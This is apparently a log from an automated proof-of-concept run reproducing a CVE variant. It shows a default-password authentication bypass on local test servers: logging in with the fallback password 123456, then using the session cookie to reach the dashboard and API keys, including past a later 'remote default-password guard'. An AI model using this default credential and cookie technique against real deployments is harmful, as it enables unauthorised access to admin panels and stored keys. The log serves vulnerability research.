[variant 14:43:07] === CVE-2026-49352 VARIANT reproduction start (default-password bypass) ===
[variant 14:43:07] Project cache dir: /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001
[variant 14:43:07] Default password under test: 123456 (INITIAL_PASSWORD fallback)
[variant 14:43:07] vuln: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo
[variant 14:43:07] fixed: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-fixed
[variant 14:43:07] latest: repo already present at /data/pruva/project-cache/4363a60d-57f6-4170-9aa0-2e4f54c86001/repo-latest
[variant 14:43:07] vuln: build already present, reusing
[variant 14:43:07] fixed: build already present, reusing
[variant 14:43:07] latest: build already present, reusing
[variant 14:43:07] --- vuln : start server (no JWT_SECRET, fresh DATA_DIR) on http://127.0.0.1:20140 ---
[variant 14:43:07] vuln server PID=5923
[variant 14:43:08] vuln: server healthy
[variant 14:43:08] vuln POST /api/auth/login {password:123456} -> 200
[variant 14:43:08] vuln GET /dashboard (default-pw cookie) -> 200
[variant 14:43:08] vuln GET /api/keys (default-pw cookie) -> 200
[variant 14:43:08] vuln negative control: no-cookie /dashboard -> 307
[variant 14:43:11] --- fixed : start server (no JWT_SECRET, fresh DATA_DIR) on http://127.0.0.1:20141 ---
[variant 14:43:11] fixed server PID=5971
[variant 14:43:12] fixed: server healthy
[variant 14:43:12] fixed POST /api/auth/login {password:123456} -> 200
[variant 14:43:12] fixed GET /dashboard (default-pw cookie) -> 200
[variant 14:43:12] fixed GET /api/keys (default-pw cookie) -> 200
[variant 14:43:12] fixed negative control: no-cookie /dashboard -> 307
[variant 14:43:14] --- latest : start server (no JWT_SECRET, fresh DATA_DIR) on http://127.0.0.1:20142 ---
[variant 14:43:14] latest server PID=6019
[variant 14:43:15] latest: server healthy
[variant 14:43:15] latest POST /api/auth/login {password:123456} -> 200
[variant 14:43:15] latest GET /dashboard (default-pw cookie) -> 200
[variant 14:43:15] latest GET /api/keys (default-pw cookie) -> 200
[variant 14:43:15] latest negative control: no-cookie /dashboard -> 307
[variant 14:43:17] === Summary ===
[variant 14:43:17] VULN v0.4.41 default-pw /dashboard: 200 /api/keys: 200
[variant 14:43:17] FIXED v0.4.44 default-pw /dashboard: 200 /api/keys: 200 (expect 200/200 = BYPASS)
[variant 14:43:17] LATEST v0.4.80 remote default-pw /dashboard: 200 /api/keys: 200 (direct cookie, bypasses UI guard)
[variant 14:43:17] === VARIANT CONFIRMED: default-password auth bypass survives the JWT fix (v0.4.44) ===
[variant 14:43:17] === VARIANT also bypasses the v0.4.80 'remote default-password guard' via direct cookie use ===
[variant 14:43:17] Exit 0: variant (default-password auth bypass) confirmed on the FIXED version